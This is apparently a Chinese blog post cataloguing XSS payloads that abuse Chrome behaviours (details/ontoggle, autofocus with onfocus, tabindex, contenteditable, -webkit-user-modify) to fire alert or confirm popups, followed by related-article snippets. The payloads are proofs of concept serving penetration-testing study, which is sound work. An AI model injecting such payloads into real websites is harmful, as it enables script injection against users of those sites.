关于谷歌浏览器特性的一些xss payload

已于 2023-06-29 21:22:59 修改
阅读量1.9k 收藏 3
点赞数
分类专栏: 随笔 文章标签: xss
于 2021-01-24 15:14:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chest_/article/details/113090984
版权

details 标签

details标签用于描述文档或文档某个部分的细节,目前只有 Chrome 支持 details标签

">'><details/open/οntοggle=confirm(1)>

autofocus属性

说明

autofocus 属性规定当页面加载时标签内元素应该自动获得焦点

onfocus 事件在对象获得焦点时发生

结合起来即可达到弹窗效果

在chrome中autofocus可以与所有HTML标签一起使用,可以利用autofocus属性进行自定义标签

<iframe autofocus onfocus=alert(1)>
<a autofocus onfocus=alert(23) href=#>x</a>

解释:autofocus在页面加载时自动获得焦点,而onfocus 事件在对象获得焦点时发生,所以会产生弹窗。

tabindex

tabIndex 属性可设置或返回单选按钮的 tab 键控制次序,也就是设置了该属性,可以用tab建来回切换标签

<xss tabindex=1 onfocus=alert(1) autofocus>

例如:

<a tabindex=1 onfocus=alert(1) autofocus>1
<a tabindex=2 onfocus=alert(2) autofocus>2
<a tabindex=3 onfocus=alert(3) autofocus>3
<a tabindex=3 onfocus=alert(4) autofocus>4

tab切换标签触发焦点从而弹窗

在这里插入图片描述

contenteditable

contenteditable 属性指定元素内容是否可编辑,当插入contenteditable后,标签页面将变得可以编辑,结合autofocus,聚焦时也可触发弹窗

<a onfocus=alert(1) autofocus contenteditable>111

在这里插入图片描述

user-modify
<x style="-webkit-user-modify:read-write-plaintext-only" onfocus=alert(1) autofocus>
<x style="-webkit-user-modify:read-write" onfocus=alert(1) autofocus>
<x style="-webkit-user-modify:read-write" onfocus=confirm() autofocus>    
confirm()
春日野穹ㅤ
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
浏览器开发者工具网络选项卡:HTTP请求与响应
qyqzIsJavatar的博客
05-02 639
浏览器开发者工具的网络选项卡是Web开发者不可或缺的工具,它提供了深入监控HTTP请求和响应的能力。通过这个工具,开发者可以查看HTTP头部信息,验证如内容类型和服务器响应;观察发送到服务器的数据体,确保正确传输所有必要信息;以及检查服务器返回的原始数据。此外,该工具还能显示请求触发的源头和详细的时间线,帮助分析性能问题。使用网络选项卡可以有效地调试问题、优化性能,是提高开发效率的关键。
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
如何查看chrome里network的payload
最新发布
宝安小雨
03-19 1189
如何查看chrome的network的请求payload,点击漏斗形状的过滤器,过滤框清空,表示检测所有,右边按钮点击“全部”,“第三方请求”不要勾选。
Chrome浏览器开发者工具中header的请求参数‘Request Payload‘ 和 ‘Query String Parameters‘ 消失不见
qq_45060674的博客
09-11 5467
chrome浏览器开发者工具中的**接口请求参数不见了**(Form Data)。上网搜索了很久,最后发现请求参数其实是在Payload
谷歌浏览器复制post请求中的request payload,如果想生成json数据
质量不太好的博客
11-14 4138
谷歌浏览器复制post请求中的request payload,如果想生成json数据
Chrome 开发者工具新功能-网络面板新增载荷(Payload)边栏
高行行
12-09 1万+
最近开发发现 Chrome 开发者工具里网络请求参数信息被放到了Payload一栏里,感觉可以,查找信息更方便了些 官方新功能介绍文档: https://developer.chrome.com/zh/blog/new-in-devtools-96/ 网络面板新增载荷(Payload)边栏 当您想查看网络请求中的 payload 信息时,可以使用网络面板里面的 Payload 边栏。此前,payload 信息出现在报头边栏里。 Chromium 议题:1214030 ...
chrome浏览器开发者模式header请求参数“Request Payload“找不到的问题
热门推荐
lixiaomei0623的专栏
11-29 1万+
今天查看接口的时候,发现chrome(谷歌)浏览器开发者工具中,接口请求的参数看不见了,对比一下其他浏览器,还是能看到请求的参数的。查看开发者工具的请求区域,发现了一栏“Payload”,里面有请求的参数。如图所示: ...
XSS payload大全
01-22
总结的XSSpayload,可以直接使用,直接进行攻击,各种payload
2020年仍然有效的一些XSS Payload
11-05
"2020年仍然有效的一些XSS Payload" XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的Web应用程序漏洞,攻击者可以通过在Web页面中inject恶意脚本代码来攻击用户。XSS攻击可以导致用户数据泄露、身份盗用、...
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
ChromeRce:2021年4月15日出现的Chrome payload
04-16
Chrome Rce Payload 文件在payload.html中
payload:浏览器的一个更简单,更小的模块加载器
05-01
有效载荷 浏览器的一个更简单,更小的模块加载器。 不用担心您JavaScript文件包含在其中的顺序。 只需声明每个模块需要哪些依赖关系,并且在加载所有依赖关系后,Payload就会初始化该模块。 还有另一个模块加载器? 是的,我知道。 CommonJS,Require,SystemJS和其他100万个都解决了这个问题。 看,我并不是说您需要使用有效负载。 我只是说有时候流行的解决方案感觉就像用大锤在墙上贴图钉一样。 有效载荷小于2kb(对于IE <9,有效载荷为三分之一),它只有两种简单的方法。 安装 bower install payload 或者: npm install payload --save 然后在模块之前将其包含在HTML中: [removed][removed]
百度编辑器解决xss漏洞
03-01
百度编辑器解决xss漏洞
ueditor php 漏洞_XSS漏洞学习(一)Payload总结
weixin_39731271的博客
11-25 785
总结到最后还是有点乱, 将就看吧, 呜呜呜~有错误还请指出.基础知识弹窗的三个函数alert(7)prompt(7)confirm(7)on事件这里太多了, 没必要列完, 真用到其他事件时百度即可.onerror 错误onload 加载onclick 点击onchange 域的内容被改变onblur 元素失去焦点onfocus 元素获得焦点onmouseover 鼠标移...
XSS Payload 学习浏览器解析机制
weixin_59280309的博客
07-25 788
浏览器解析机制遵循规则;XSS Payload举例:
Web安全—有效载荷Payload
weixin_44431280的博客
02-12 5149
有效载荷—Payload 提要:在Web安全的学习过程中,通常会提到Payload这个词,但是这个在安全中代表什么含义。 简介: Payload直接可以翻译为"有效载荷",其含义可以理解为数据包中的"有效数据"。 Payload理解总结: 协议角度分析:一个完整的数据传输过程中通常由三部分组成,分别是数据头部+原始数据(数据帧或数据包+校验尾部),数据头和校验尾部是为了原始数据的准确传输起作用,那么其中的原始数据就是我们通常说的Payload。 IPV4协议数据包结构举例: BurpSuite中Paylo
解决chrome(谷歌)浏览器开发者工具中header的请求参数“Request Payload“和“Query String Parameters“(消失)不见了的问题
m0_67394006的博客
03-10 9615
今天调试前端接口的时候,突然发现chrome(谷歌)浏览器开发者工具中,接口请求的参数看不见了,对比一下其他浏览器,还是能看到请求的参数的。于是上网搜了一遍都没有找到解决方案。最后仔细看看开发者工具的请求区域,发现了一栏“Payload”,里面有请求的参数。如图所示: ...
xss payload
09-30
XSS(跨站脚本攻击) Payload是一种攻击技术,通过在网页中插入恶意代码来窃取用户信息或者对用户进行攻击。以下是几个XSS Payload的例子: 1. `<script>alert('XSS')</script>`:这个Payload会在页面加载时执行一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值